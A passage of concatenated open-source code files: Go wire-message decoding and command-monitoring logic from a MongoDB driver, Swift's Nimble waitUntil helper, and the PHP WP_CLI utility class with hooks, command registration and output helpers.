	reply.numReturned, wm, ok = wiremessage.ReadReplyNumberReturned(wm)
	if !ok {
		reply.err = errors.New("malformed OP_REPLY: missing numberReturned")
		return reply
	}
	reply.documents, wm, ok = wiremessage.ReadReplyDocuments(wm)
	if !ok {
		reply.err = errors.New("malformed OP_REPLY: could not read documents from reply")
		// BUG FIX: previously fell through without returning here, which
		// could reach reply.documents[0] below with an empty slice and panic.
		return reply
	}

	if reply.responseFlags&wiremessage.QueryFailure == wiremessage.QueryFailure {
		qfe := QueryFailureError{
			Message: "command failure",
		}
		// Guard against a missing failure document (robustness; the wire
		// protocol normally guarantees one is present).
		if len(reply.documents) > 0 {
			qfe.Response = reply.documents[0]
		}
		reply.err = qfe
		return reply
	}
	if reply.responseFlags&wiremessage.CursorNotFound == wiremessage.CursorNotFound {
		reply.err = ErrCursorNotFound
		return reply
	}
	if reply.numReturned != int32(len(reply.documents)) {
		reply.err = ErrReplyDocumentMismatch
		return reply
	}

	return reply
}
// decodeResult decodes the server's response document from an OP_REPLY or
// OP_MSG wire message. wm must include the 16-byte message header. Returns
// the single result document plus any server-side error extracted from it.
func (op Operation) decodeResult(wm []byte) (bsoncore.Document, error) {
	wmLength := len(wm)
	length, _, _, opcode, wm, ok := wiremessage.ReadHeader(wm)
	if !ok || int(length) > wmLength {
		return nil, errors.New("malformed wire message: insufficient bytes")
	}

	// Constrain to just this wire message, in case there are multiple in the slice.
	wm = wm[:wmLength-16]

	switch opcode {
	case wiremessage.OpReply:
		reply := op.decodeOpReply(wm, false)
		if reply.err != nil {
			return nil, reply.err
		}
		if reply.numReturned == 0 {
			return nil, ErrNoDocCommandResponse
		}
		if reply.numReturned > 1 {
			return nil, ErrMultiDocCommandResponse
		}
		rdr := reply.documents[0]
		if err := rdr.Validate(); err != nil {
			return nil, NewCommandResponseError("malformed OP_REPLY: invalid document", err)
		}
		return rdr, extractError(rdr)
	case wiremessage.OpMsg:
		_, wm, ok = wiremessage.ReadMsgFlags(wm)
		if !ok {
			return nil, errors.New("malformed wire message: missing OP_MSG flags")
		}

		var res bsoncore.Document
		for len(wm) > 0 {
			var stype wiremessage.SectionType
			stype, wm, ok = wiremessage.ReadMsgSectionType(wm)
			if !ok {
				// Message typo fixed: was "insuffienct".
				return nil, errors.New("malformed wire message: insufficient bytes to read section type")
			}

			switch stype {
			case wiremessage.SingleDocument:
				res, wm, ok = wiremessage.ReadMsgSectionSingleDocument(wm)
				if !ok {
					return nil, errors.New("malformed wire message: insufficient bytes to read single document")
				}
			case wiremessage.DocumentSequence:
				// TODO(GODRIVER-617): Implement document sequence returns.
				_, _, wm, ok = wiremessage.ReadMsgSectionDocumentSequence(wm)
				if !ok {
					return nil, errors.New("malformed wire message: insufficient bytes to read document sequence")
				}
			default:
				// Message typo fixed: was "uknown".
				return nil, fmt.Errorf("malformed wire message: unknown section type %v", stype)
			}
		}

		err := res.Validate()
		if err != nil {
			return nil, NewCommandResponseError("malformed OP_MSG: invalid document", err)
		}
		return res, extractError(res)
	default:
		return nil, fmt.Errorf("cannot decode result from %s", opcode)
	}
}
// getCommandName returns the name of the command from the given BSON document,
// i.e. the key of its first element. Returns "" for documents too short to
// hold a first element or lacking a key terminator (malformed input previously
// caused a slice-bounds panic here when IndexByte returned -1).
func (op Operation) getCommandName(doc []byte) string {
	// Skip 4 bytes for document length and 1 byte for element type.
	if len(doc) < 5 {
		return ""
	}
	idx := bytes.IndexByte(doc[5:], 0x00) // look for the 0 byte after the command name
	if idx < 0 {
		return ""
	}
	return string(doc[5 : idx+5])
}
// redactCommand reports whether the command's contents must be hidden from
// command monitoring because they may contain credentials.
func (op *Operation) redactCommand(cmd string, doc bsoncore.Document) bool {
	switch cmd {
	case "authenticate", "saslStart", "saslContinue", "getnonce", "createUser",
		"updateUser", "copydbgetnonce", "copydbsaslstart", "copydb":
		return true
	}

	if strings.ToLower(cmd) != "ismaster" {
		return false
	}

	// An isMaster is only sensitive when it carries speculative authentication.
	_, lookupErr := doc.LookupErr("speculativeAuthenticate")
	return lookupErr == nil
}
// publishStartedEvent publishes a CommandStartedEvent to the operation's command monitor if possible. If the command is
// an unacknowledged write, a CommandSucceededEvent will be published as well. If started events are not being monitored,
// no events are published.
func (op Operation) publishStartedEvent(ctx context.Context, info startedInformation) {
if op.CommandMonitor == nil || op.CommandMonitor.Started == nil {
return
}
// Make a copy of the command. Redact if the command is security sensitive and cannot be monitored.
// If there was a type 1 payload for the current batch, convert it to a BSON array.
cmdCopy := bson.Raw{}
if !info.redacted {
cmdCopy = make([]byte, len(info.cmd))
copy(cmdCopy, info.cmd)
if info.documentSequenceIncluded {
// Strip the document's terminating null byte, splice the batch in as a
// BSON array, then re-terminate and fix up the length prefix.
cmdCopy = cmdCopy[:len(info.cmd)-1] // remove 0 byte at end
cmdCopy = op.addBatchArray(cmdCopy)
cmdCopy, _ = bsoncore.AppendDocumentEnd(cmdCopy, 0) // add back 0 byte and update length
}
}
started := &event.CommandStartedEvent{
Command: cmdCopy,
DatabaseName: op.Database,
CommandName: info.cmdName,
RequestID: int64(info.requestID),
ConnectionID: info.connID,
}
op.CommandMonitor.Started(ctx, started)
}
// publishFinishedEvent publishes either a CommandSucceededEvent or a CommandFailedEvent to the operation's command
// monitor if possible. If success/failure events aren't being monitored, no events are published.
func (op Operation) publishFinishedEvent(ctx context.Context, info finishedInformation) {
	// A WriteCommandError means the command itself completed; write errors
	// ride inside the reply, so it is reported as a succeeded event.
	success := info.cmdErr == nil
	if _, ok := info.cmdErr.(WriteCommandError); ok {
		success = true
	}
	if op.CommandMonitor == nil || (success && op.CommandMonitor.Succeeded == nil) || (!success && op.CommandMonitor.Failed == nil) {
		return
	}

	var durationNanos int64
	// Idiomatic zero-time check and duration computation (previously compared
	// against a manually constructed empty time.Time and used Now().Sub).
	if !info.startTime.IsZero() {
		durationNanos = time.Since(info.startTime).Nanoseconds()
	}

	finished := event.CommandFinishedEvent{
		CommandName:   info.cmdName,
		RequestID:     int64(info.requestID),
		ConnectionID:  info.connID,
		DurationNanos: durationNanos,
	}

	if success {
		res := bson.Raw{}
		// Only copy the reply for commands that are not security sensitive.
		if !info.redacted {
			res = make([]byte, len(info.response))
			copy(res, info.response)
		}
		successEvent := &event.CommandSucceededEvent{
			Reply:                res,
			CommandFinishedEvent: finished,
		}
		op.CommandMonitor.Succeeded(ctx, successEvent)
		return
	}

	failedEvent := &event.CommandFailedEvent{
		Failure:              info.cmdErr.Error(),
		CommandFinishedEvent: finished,
	}
	op.CommandMonitor.Failed(ctx, failedEvent)
}
| {
"pile_set_name": "Github"
} |
import Foundation
#if _runtime(_ObjC)
/// Outcome of an asynchronously awaited block: an Objective-C exception, a
/// thrown Swift error, or successful completion (`none`).
private enum ErrorResult {
case exception(NSException)
case error(Error)
case none
}
/// Only classes, protocols, methods, properties, and subscript declarations can be
/// bridges to Objective-C via the @objc keyword. This class encapsulates callback-style
/// asynchronous waiting logic so that it may be called from Objective-C and Swift.
internal class NMBWait: NSObject {
// Waits until `done` is invoked or `timeout` elapses. Objective-C compatible
// entry point that simply forwards to the throwable variant below.
internal class func until(
timeout: TimeInterval,
file: FileString = #file,
line: UInt = #line,
action: @escaping (@escaping () -> Void) -> Void) -> Void {
return throwableUntil(timeout: timeout, file: file, line: line) { done in
action(done)
}
}
// Using a throwable closure makes this method not objc compatible.
internal class func throwableUntil(
timeout: TimeInterval,
file: FileString = #file,
line: UInt = #line,
action: @escaping (@escaping () -> Void) throws -> Void) -> Void {
let awaiter = NimbleEnvironment.activeInstance.awaiter
// Half the timeout is granted to the timeout handler before the run loop
// is forcefully aborted.
let leeway = timeout / 2.0
let result = awaiter.performBlock { (done: @escaping (ErrorResult) -> Void) throws -> Void in
// Run the action on the main queue, funneling both NSExceptions and
// thrown Swift errors into a single ErrorResult.
DispatchQueue.main.async {
let capture = NMBExceptionCapture(
handler: ({ exception in
done(.exception(exception))
}),
finally: ({ })
)
capture.tryBlock {
do {
try action() {
done(.none)
}
} catch let e {
done(.error(e))
}
}
}
}.timeout(timeout, forcefullyAbortTimeout: leeway).wait("waitUntil(...)", file: file, line: line)
// Translate the awaiter's terminal state into a test pass/failure.
switch result {
case .incomplete: internalError("Reached .incomplete state for waitUntil(...).")
case .blockedRunLoop:
fail(blockedRunLoopErrorMessageFor("-waitUntil()", leeway: leeway),
file: file, line: line)
case .timedOut:
let pluralize = (timeout == 1 ? "" : "s")
fail("Waited more than \(timeout) second\(pluralize)", file: file, line: line)
case let .raisedException(exception):
fail("Unexpected exception raised: \(exception)")
case let .errorThrown(error):
fail("Unexpected error thrown: \(error)")
case .completed(.exception(let exception)):
fail("Unexpected exception raised: \(exception)")
case .completed(.error(let error)):
fail("Unexpected error thrown: \(error)")
case .completed(.none): // success
break
}
}
// Objective-C-visible overload using the default one-second timeout.
@objc(untilFile:line:action:)
internal class func until(_ file: FileString = #file, line: UInt = #line, action: @escaping (() -> Void) -> Void) -> Void {
until(timeout: 1, file: file, line: line, action: action)
}
}
/// Builds the failure message shown when a wait times out but the timeout
/// handler could not run because the main thread was unresponsive.
/// (Grammar fix in the message: "is allow" -> "is allowed".)
internal func blockedRunLoopErrorMessageFor(_ fnName: String, leeway: TimeInterval) -> String {
    return "\(fnName) timed out but was unable to run the timeout handler because the main thread is unresponsive (\(leeway) seconds is allowed after the wait times out). Conditions that may cause this include processing blocking IO on the main thread, calls to sleep(), deadlocks, and synchronous IPC. Nimble forcefully stopped run loop which may cause future failures in test run."
}
/// Wait asynchronously until the done closure is called or the timeout has been reached.
///
/// @discussion
/// Call the done() closure to indicate the waiting has completed.
///
/// This function manages the main run loop (`NSRunLoop.mainRunLoop()`) while this function
/// is executing. Any attempts to touch the run loop may cause non-deterministic behavior.
///
/// Forwards directly to `NMBWait.until`, which performs the actual waiting.
public func waitUntil(timeout: TimeInterval = 1, file: FileString = #file, line: UInt = #line, action: @escaping (@escaping () -> Void) -> Void) -> Void {
NMBWait.until(timeout: timeout, file: file, line: line, action: action)
}
#endif
| {
"pile_set_name": "Github"
} |
<?php
use \WP_CLI\Utils;
use \WP_CLI\Dispatcher;
use \WP_CLI\FileCache;
use \WP_CLI\Process;
use \WP_CLI\WpHttpCacheManager;
/**
* Various utilities for WP-CLI commands.
*/
class WP_CLI {
private static $configurator;
private static $logger;
private static $hooks = array(), $hooks_passed = array();
/**
 * Set the logger instance.
 *
 * The logger backs all WP_CLI output helpers (log, success, warning, error,
 * debug); it must be set during bootstrap before any of them are called.
 *
 * @param object $logger
 */
public static function set_logger( $logger ) {
self::$logger = $logger;
}
/**
 * Get the Configurator instance.
 *
 * Lazily instantiated on first use. Stored on the declared
 * `self::$configurator` property; previously a function-local static
 * shadowed that property, leaving it permanently unused.
 *
 * @return \WP_CLI\Configurator
 */
public static function get_configurator() {
	if ( ! self::$configurator ) {
		self::$configurator = new WP_CLI\Configurator( WP_CLI_ROOT . '/php/config-spec.php' );
	}
	return self::$configurator;
}
/**
 * Get the root command instance (lazily created singleton).
 *
 * @return \WP_CLI\Dispatcher\RootCommand
 */
public static function get_root_command() {
	static $root = null;
	if ( null === $root ) {
		$root = new Dispatcher\RootCommand;
	}
	return $root;
}
/**
 * Get the Runner instance (lazily created singleton).
 *
 * @return \WP_CLI\Runner
 */
public static function get_runner() {
	static $runner = null;
	if ( null === $runner ) {
		$runner = new WP_CLI\Runner;
	}
	return $runner;
}
/**
 * Get the file cache singleton used for downloads and cached HTTP responses.
 *
 * Cache directory resolution: $WP_CLI_CACHE_DIR if set, otherwise
 * "$HOME/.wp-cli/cache" (falling back to HOMEDRIVE + HOMEPATH when HOME is
 * undefined, as on some Windows setups).
 *
 * @return FileCache
 */
public static function get_cache() {
static $cache;
if ( !$cache ) {
$home = getenv( 'HOME' );
if ( !$home ) {
// sometime in windows $HOME is not defined
$home = getenv( 'HOMEDRIVE' ) . getenv( 'HOMEPATH' );
}
$dir = getenv( 'WP_CLI_CACHE_DIR' ) ? : "$home/.wp-cli/cache";
// TTL 6 months (15552000 s), max size 300mb (314572800 bytes)
$cache = new FileCache( $dir, 15552000, 314572800 );
// clean older files on shutdown with 1/51 probability (mt_rand's range is inclusive on both ends)
if ( 0 === mt_rand( 0, 50 ) ) {
register_shutdown_function( function () use ( $cache ) {
$cache->clean();
} );
}
}
return $cache;
}
/**
 * Set the context in which WP-CLI should be run.
 *
 * Parses the given URL and maps its parts onto the $_SERVER superglobal so
 * WordPress behaves as if the request had been made to that URL.
 *
 * @param string $url URL to emulate the request against.
 */
public static function set_url( $url ) {
WP_CLI::debug( 'Set URL: ' . $url, 'bootstrap' );
$url_parts = Utils\parse_url( $url );
self::set_url_params( $url_parts );
}
/**
 * Populate $_SERVER keys (HTTPS, HTTP_HOST, SERVER_NAME, REQUEST_URI,
 * SERVER_PORT, QUERY_STRING) from parsed URL parts.
 *
 * @param array $url_parts Result of Utils\parse_url().
 */
private static function set_url_params( $url_parts ) {
// Helper returning a URL part, or '' when the part is absent.
$f = function( $key ) use ( $url_parts ) {
return \WP_CLI\Utils\get_flag_value( $url_parts, $key, '' );
};
if ( isset( $url_parts['host'] ) ) {
if ( isset( $url_parts['scheme'] ) && 'https' === strtolower( $url_parts['scheme'] ) ) {
$_SERVER['HTTPS'] = 'on';
}
// HTTP_HOST carries the port suffix; SERVER_NAME never does.
$_SERVER['HTTP_HOST'] = $url_parts['host'];
if ( isset( $url_parts['port'] ) ) {
$_SERVER['HTTP_HOST'] .= ':' . $url_parts['port'];
}
$_SERVER['SERVER_NAME'] = $url_parts['host'];
}
$_SERVER['REQUEST_URI'] = $f('path') . ( isset( $url_parts['query'] ) ? '?' . $url_parts['query'] : '' );
$_SERVER['SERVER_PORT'] = \WP_CLI\Utils\get_flag_value( $url_parts, 'port', '80' );
$_SERVER['QUERY_STRING'] = $f('query');
}
/**
 * Get the WordPress HTTP cache manager, creating it on first use and
 * backing it with the shared file cache.
 *
 * @return WpHttpCacheManager
 */
public static function get_http_cache_manager() {
	static $manager = null;
	if ( null === $manager ) {
		$manager = new WpHttpCacheManager( self::get_cache() );
	}
	return $manager;
}
/**
 * Colorize a string for output.
 *
 * Yes, you too can change the color of command line text. For instance,
 * here's how `WP_CLI::success()` colorizes "Success: "
 *
 * ```
 * WP_CLI::colorize( "%GSuccess:%n " )
 * ```
 *
 * Uses `\cli\Colors::colorize()` to transform color tokens to display
 * settings. Choose from the following tokens (and note 'reset'):
 *
 * * %y => ['color' => 'yellow'],
 * * %g => ['color' => 'green'],
 * * %b => ['color' => 'blue'],
 * * %r => ['color' => 'red'],
 * * %p => ['color' => 'magenta'],
 * * %m => ['color' => 'magenta'],
 * * %c => ['color' => 'cyan'],
 * * %w => ['color' => 'grey'],
 * * %k => ['color' => 'black'],
 * * %n => ['color' => 'reset'],
 * * %Y => ['color' => 'yellow', 'style' => 'bright'],
 * * %G => ['color' => 'green', 'style' => 'bright'],
 * * %B => ['color' => 'blue', 'style' => 'bright'],
 * * %R => ['color' => 'red', 'style' => 'bright'],
 * * %P => ['color' => 'magenta', 'style' => 'bright'],
 * * %M => ['color' => 'magenta', 'style' => 'bright'],
 * * %C => ['color' => 'cyan', 'style' => 'bright'],
 * * %W => ['color' => 'grey', 'style' => 'bright'],
 * * %K => ['color' => 'black', 'style' => 'bright'],
 * * %N => ['color' => 'reset', 'style' => 'bright'],
 * * %3 => ['background' => 'yellow'],
 * * %2 => ['background' => 'green'],
 * * %4 => ['background' => 'blue'],
 * * %1 => ['background' => 'red'],
 * * %5 => ['background' => 'magenta'],
 * * %6 => ['background' => 'cyan'],
 * * %7 => ['background' => 'grey'],
 * * %0 => ['background' => 'black'],
 * * %F => ['style' => 'blink'],
 * * %U => ['style' => 'underline'],
 * * %8 => ['style' => 'inverse'],
 * * %9 => ['style' => 'bright'],
 * * %_ => ['style' => 'bright')
 *
 * @access public
 * @category Output
 *
 * @param string $string String to colorize for output, with color tokens.
 * @return string Colorized string.
 */
public static function colorize( $string ) {
// Tokens are stripped (rather than colorized) when the runner is not in color mode.
return \cli\Colors::colorize( $string, self::get_runner()->in_color() );
}
/**
 * Schedule a callback to be executed at a certain point.
 *
 * Hooks conceptually are very similar to WordPress actions. WP-CLI hooks
 * are typically called before WordPress is loaded.
 *
 * WP-CLI hooks include:
 *
 * * `before_invoke:<command>` - Just before a command is invoked.
 * * `after_invoke:<command>` - Just after a command is involved.
 * * `before_wp_load` - Just before the WP load process begins.
 * * `before_wp_config_load` - After wp-config.php has been located.
 * * `after_wp_config_load` - After wp-config.php has been loaded into scope.
 * * `after_wp_load` - Just after the WP load process has completed.
 *
 * WP-CLI commands can create their own hooks with `WP_CLI::do_hook()`.
 *
 * ```
 * # `wp network meta` confirms command is executing in multisite context.
 * WP_CLI::add_command( 'network meta', 'Network_Meta_Command', array(
 *    'before_invoke' => function () {
 *        if ( !is_multisite() ) {
 *            WP_CLI::error( 'This is not a multisite install.' );
 *        }
 *    }
 * ) );
 * ```
 *
 * @access public
 * @category Registration
 *
 * @param string $when Identifier for the hook.
 * @param mixed $callback Callback to execute when hook is called.
 * @return null
 */
public static function add_hook( $when, $callback ) {
	// If the hook already fired, run the callback immediately so late
	// registrants still execute; it is also queued for any future firings.
	// (Braces added to the previously unbraced if; strict in_array comparison.)
	if ( in_array( $when, self::$hooks_passed, true ) ) {
		call_user_func( $callback );
	}
	self::$hooks[ $when ][] = $callback;
}
/**
 * Execute callbacks registered to a given hook.
 *
 * See `WP_CLI::add_hook()` for details on WP-CLI's internal hook system.
 * Commands can provide and call their own hooks. Any arguments passed after
 * $when are forwarded to each callback.
 *
 * @access public
 * @category Registration
 *
 * @param string $when Identifier for the hook.
 * @return null
 */
public static function do_hook( $when ) {
	// Record that this hook has fired, so late registrations run immediately.
	self::$hooks_passed[] = $when;
	if ( ! isset( self::$hooks[ $when ] ) ) {
		return;
	}
	$extra_args = array_slice( func_get_args(), 1 );
	foreach ( self::$hooks[ $when ] as $callback ) {
		// With no extra args this is equivalent to call_user_func( $callback ).
		call_user_func_array( $callback, $extra_args );
	}
}
/**
 * Add a callback to a WordPress action or filter.
 *
 * `add_action()` without needing access to `add_action()`. If WordPress is
 * already loaded though, you should use `add_action()` (and `add_filter()`)
 * instead.
 *
 * @access public
 * @category Registration
 *
 * @param string $tag Named WordPress action or filter.
 * @param mixed $function_to_add Callable to execute when the action or filter is evaluated.
 * @param integer $priority Priority to add the callback as.
 * @param integer $accepted_args Number of arguments to pass to callback.
 * @return true
 */
public static function add_wp_hook( $tag, $function_to_add, $priority = 10, $accepted_args = 1 ) {
global $wp_filter, $merged_filters;
if ( function_exists( 'add_filter' ) ) {
add_filter( $tag, $function_to_add, $priority, $accepted_args );
} else {
// WordPress not loaded yet: mimic add_filter() by writing directly into
// the global $wp_filter structure WordPress will consume once it loads.
$idx = self::wp_hook_build_unique_id( $tag, $function_to_add, $priority );
$wp_filter[$tag][$priority][$idx] = array('function' => $function_to_add, 'accepted_args' => $accepted_args);
// Invalidate WordPress's merged-filters cache for this tag.
unset( $merged_filters[ $tag ] );
}
return true;
}
/**
 * Build Unique ID for storage and retrieval.
 *
 * Essentially _wp_filter_build_unique_id() without needing access to _wp_filter_build_unique_id()
 *
 * @param string    $tag      Hook name (used to look up existing priorities).
 * @param callable  $function Callback: function name, object/closure, or array callable.
 * @param int|false $priority Priority, or false to refuse assigning a new object id.
 * @return string|false|null Unique id; false when a new object id is needed but
 *                           $priority is false. NOTE(review): falls off the end
 *                           (implicitly returns null) for array callables whose
 *                           first element is neither object nor string —
 *                           presumed unreachable for valid callables; confirm.
 */
private static function wp_hook_build_unique_id( $tag, $function, $priority ) {
global $wp_filter;
static $filter_id_count = 0;
// A plain function name is its own id.
if ( is_string($function) )
return $function;
if ( is_object($function) ) {
// Closures are currently implemented as objects
$function = array( $function, '' );
} else {
$function = (array) $function;
}
if (is_object($function[0]) ) {
// Object Class Calling
if ( function_exists('spl_object_hash') ) {
return spl_object_hash($function[0]) . $function[1];
} else {
// No spl_object_hash(): tag the object itself with an incrementing id.
$obj_idx = get_class($function[0]).$function[1];
if ( !isset($function[0]->wp_filter_id) ) {
if ( false === $priority )
return false;
$obj_idx .= isset($wp_filter[$tag][$priority]) ? count((array)$wp_filter[$tag][$priority]) : $filter_id_count;
$function[0]->wp_filter_id = $filter_id_count;
++$filter_id_count;
} else {
$obj_idx .= $function[0]->wp_filter_id;
}
return $obj_idx;
}
} elseif ( is_string( $function[0] ) ) {
// Static Calling
return $function[0] . '::' . $function[1];
}
}
/**
 * Register a command to WP-CLI.
 *
 * WP-CLI supports using any callable class, function, or closure as a
 * command. `WP_CLI::add_command()` is used for both internal and
 * third-party command registration.
 *
 * Command arguments are parsed from PHPDoc by default, but also can be
 * supplied as an optional third argument during registration.
 *
 * ```
 * # Register a custom 'foo' command to output a supplied positional param.
 * #
 * # $ wp foo bar
 * # Success: bar
 *
 * /**
 *  * My awesome closure command
 *  *
 *  * <message>
 *  * : An awesome message to display
 *  *
 *  * @when before_wp_load
 *  *\/
 * $foo = function( $args ) {
 *     WP_CLI::success( $args[0] );
 * };
 * WP_CLI::add_command( 'foo', $foo );
 * ```
 *
 * @access public
 * @category Registration
 *
 * @param string $name Name for the command (e.g. "post list" or "site empty").
 * @param string $callable Command implementation as a class, function or closure.
 * @param array $args {
 *      Optional An associative array with additional registration parameters.
 *      'before_invoke' => callback to execute before invoking the command,
 *      'after_invoke' => callback to execute after invoking the command,
 *      'shortdesc' => short description (80 char or less) for the command,
 *      'synopsis' => the synopsis for the command (string or array),
 *      'when' => execute callback on a named WP-CLI hook (e.g. before_wp_load),
 * }
 * @return true True on success, hard error if registration failed.
 */
public static function add_command( $name, $callable, $args = array() ) {
	// Validate that $callable is something we can dispatch to.
	$valid = false;
	if ( is_callable( $callable ) ) {
		$valid = true;
	} else if ( is_string( $callable ) && class_exists( (string) $callable ) ) {
		$valid = true;
	} else if ( is_object( $callable ) ) {
		$valid = true;
	}
	if ( ! $valid ) {
		if ( is_array( $callable ) ) {
			$callable[0] = is_object( $callable[0] ) ? get_class( $callable[0] ) : $callable[0];
			$callable = array( $callable[0], $callable[1] );
		}
		WP_CLI::error( sprintf( "Callable %s does not exist, and cannot be registered as `wp %s`.", json_encode( $callable ), $name ) );
	}
	foreach( array( 'before_invoke', 'after_invoke' ) as $when ) {
		if ( isset( $args[ $when ] ) ) {
			self::add_hook( "{$when}:{$name}", $args[ $when ] );
		}
	}
	$path = preg_split( '/\s+/', $name );
	$leaf_name = array_pop( $path );
	// (Removed unused local $full_path, which was assigned but never read.)
	$command = self::get_root_command();
	// Walk (creating empty containers as needed) the chain of parent
	// commands; find_subcommand() consumes entries from $path as it descends.
	while ( !empty( $path ) ) {
		$subcommand_name = $path[0];
		$subcommand = $command->find_subcommand( $path );
		// create an empty container
		if ( !$subcommand ) {
			$subcommand = new Dispatcher\CompositeCommand( $command, $subcommand_name,
				new \WP_CLI\DocParser( '' ) );
			$command->add_subcommand( $subcommand_name, $subcommand );
		}
		$command = $subcommand;
	}
	$leaf_command = Dispatcher\CommandFactory::create( $leaf_name, $callable, $command );
	if ( ! $command->can_have_subcommands() ) {
		throw new Exception( sprintf( "'%s' can't have subcommands.",
			implode( ' ' , Dispatcher\get_path( $command ) ) ) );
	}
	if ( isset( $args['shortdesc'] ) ) {
		$leaf_command->set_shortdesc( $args['shortdesc'] );
	}
	if ( isset( $args['synopsis'] ) ) {
		if ( is_string( $args['synopsis'] ) ) {
			$leaf_command->set_synopsis( $args['synopsis'] );
		} else if ( is_array( $args['synopsis'] ) ) {
			$synopsis = \WP_CLI\SynopsisParser::render( $args['synopsis'] );
			$leaf_command->set_synopsis( $synopsis );
			$long_desc = '';
			$bits = explode( ' ', $synopsis );
			foreach( $args['synopsis'] as $key => $arg ) {
				$long_desc .= $bits[ $key ] . PHP_EOL;
				if ( ! empty( $arg['description'] ) ) {
					$long_desc .= ': ' . $arg['description'] . PHP_EOL;
				}
				$yamlify = array();
				// Renamed loop variable from $key to avoid shadowing the
				// outer foreach's $key.
				foreach( array( 'default', 'options' ) as $arg_field ) {
					if ( isset( $arg[ $arg_field ] ) ) {
						$yamlify[ $arg_field ] = $arg[ $arg_field ];
					}
				}
				if ( ! empty( $yamlify ) ) {
					$long_desc .= \Spyc::YAMLDump( $yamlify );
					$long_desc .= '---' . PHP_EOL;
				}
				$long_desc .= PHP_EOL;
			}
			if ( ! empty( $long_desc ) ) {
				$long_desc = rtrim( $long_desc, PHP_EOL );
				$long_desc = '## OPTIONS' . PHP_EOL . PHP_EOL . $long_desc;
				$leaf_command->set_longdesc( $long_desc );
			}
		}
	}
	if ( isset( $args['when'] ) ) {
		self::get_runner()->register_early_invoke( $args['when'], $leaf_command );
	}
	$command->add_subcommand( $leaf_name, $leaf_command );
	return true;
}
/**
 * Display a message on STDOUT without any prefix, ignoring `--quiet`.
 *
 * Prefer `WP_CLI::log()` for new code; `WP_CLI::line()` exists for
 * historical compatibility.
 *
 * @access public
 * @category Output
 *
 * @param string $message Message to display to the end user.
 * @return null
 */
public static function line( $message = '' ) {
	echo "{$message}\n";
}
/**
 * Display informational message without prefix.
 *
 * Message is written to STDOUT, or discarded when `--quiet` flag is supplied.
 * Delegates to the active logger instance set via `WP_CLI::set_logger()`.
 *
 * ```
 * # `wp cli update` lets user know of each step in the update process.
 * WP_CLI::log( sprintf( 'Downloading from %s...', $download_url ) );
 * ```
 *
 * @access public
 * @category Output
 *
 * @param string $message Message to write to STDOUT.
 */
public static function log( $message ) {
self::$logger->info( $message );
}
/**
 * Display success message prefixed with "Success: ".
 *
 * Success message is written to STDOUT. Delegates to the active logger
 * instance set via `WP_CLI::set_logger()`.
 *
 * Typically recommended to inform user of successful script conclusion.
 *
 * ```
 * # wp rewrite flush expects 'rewrite_rules' option to be set after flush.
 * flush_rewrite_rules( \WP_CLI\Utils\get_flag_value( $assoc_args, 'hard' ) );
 * if ( ! get_option( 'rewrite_rules' ) ) {
 *     WP_CLI::warning( "Rewrite rules are empty." );
 * } else {
 *     WP_CLI::success( 'Rewrite rules flushed.' );
 * }
 * ```
 *
 * @access public
 * @category Output
 *
 * @param string $message Message to write to STDOUT.
 * @return null
 */
public static function success( $message ) {
self::$logger->success( $message );
}
/**
* Display debug message prefixed with "Debug: " when `--debug` is used.
*
* Debug message is written to STDERR, and includes script execution time.
*
* Helpful for optionally showing greater detail when needed. Used throughout
* WP-CLI bootstrap process for easier debugging and profiling.
*
* ```
* # Called in `WP_CLI\Runner::set_wp_root()`.
* private static function set_wp_root( $path ) {
* define( 'ABSPATH', rtrim( $path, '/' ) . '/' );
* WP_CLI::debug( 'ABSPATH defined: ' . ABSPATH );
* $_SERVER['DOCUMENT_ROOT'] = realpath( $path );
* }
*
* # Debug details only appear when `--debug` is used.
* # $ wp --debug
* # [...]
* # Debug: ABSPATH defined: /srv/www/wordpress-develop.dev/src/ (0.225s)
* ```
*
* @access public
* @category Output
*
* @param string $message Message to write to STDERR.
* @param string $group Organize debug message to a specific group.
* @return null
*/
	public static function debug( $message, $group = false ) {
		// Normalize WP_Error objects to a string before logging; $group = false
		// means the message belongs to no specific debug group.
		self::$logger->debug( self::error_to_string( $message ), $group );
	}
/**
* Display warning message prefixed with "Warning: ".
*
* Warning message is written to STDERR.
*
 * Use instead of `WP_CLI::error()` when script execution should be permitted
 * to continue.
*
* ```
* # `wp plugin activate` skips activation when plugin is network active.
* $status = $this->get_status( $plugin->file );
* // Network-active is the highest level of activation status
* if ( 'active-network' === $status ) {
* WP_CLI::warning( "Plugin '{$plugin->name}' is already network active." );
* continue;
* }
* ```
*
* @access public
* @category Output
*
* @param string $message Message to write to STDERR.
* @return null
*/
	public static function warning( $message ) {
		// Normalize WP_Error objects to a string; logger prefixes "Warning: "
		// and writes to STDERR. Execution continues (contrast with error()).
		self::$logger->warning( self::error_to_string( $message ) );
	}
/**
* Display error message prefixed with "Error: " and exit script.
*
* Error message is written to STDERR. Defaults to halting script execution
* with return code 1.
*
* Use `WP_CLI::warning()` instead when script execution should be permitted
* to continue.
*
* ```
* # `wp cache flush` considers flush failure to be a fatal error.
* if ( false === wp_cache_flush() ) {
* WP_CLI::error( 'The object cache could not be flushed.' );
* }
* ```
*
* @access public
* @category Output
*
* @param string|WP_Error $message Message to write to STDERR.
 * @param boolean|integer $exit Exit code to use; `true` exits with code 1, `false` continues execution.
* @return null
*/
public static function error( $message, $exit = true ) {
if ( ! isset( self::get_runner()->assoc_args[ 'completions' ] ) ) {
self::$logger->error( self::error_to_string( $message ) );
}
if ( true === $exit ) {
exit( 1 );
} elseif ( is_int( $exit ) && $exit >= 1 ) {
exit( $exit );
}
}
/**
* Display a multi-line error message in a red box. Doesn't exit script.
*
* Error message is written to STDERR.
*
* @access public
* @category Output
*
 * @param array $message_lines Multi-line error message to be displayed, one line per array element.
*/
public static function error_multi_line( $message_lines ) {
if ( ! isset( self::get_runner()->assoc_args[ 'completions' ] ) && is_array( $message_lines ) ) {
self::$logger->error_multi_line( array_map( array( __CLASS__, 'error_to_string' ), $message_lines ) );
}
}
/**
* Ask for confirmation before running a destructive operation.
*
* If 'y' is provided to the question, the script execution continues. If
* 'n' or any other response is provided to the question, script exits.
*
* ```
* # `wp db drop` asks for confirmation before dropping the database.
*
* WP_CLI::confirm( "Are you sure you want to drop the database?", $assoc_args );
* ```
*
* @access public
* @category Input
*
* @param string $question Question to display before the prompt.
* @param array $assoc_args Skips prompt if 'yes' is provided.
*/
public static function confirm( $question, $assoc_args = array() ) {
if ( ! \WP_CLI\Utils\get_flag_value( $assoc_args, 'yes' ) ) {
fwrite( STDOUT, $question . " [y/n] " );
$answer = strtolower( trim( fgets( STDIN ) ) );
if ( 'y' != $answer )
exit;
}
}
/**
* Read value from a positional argument or from STDIN.
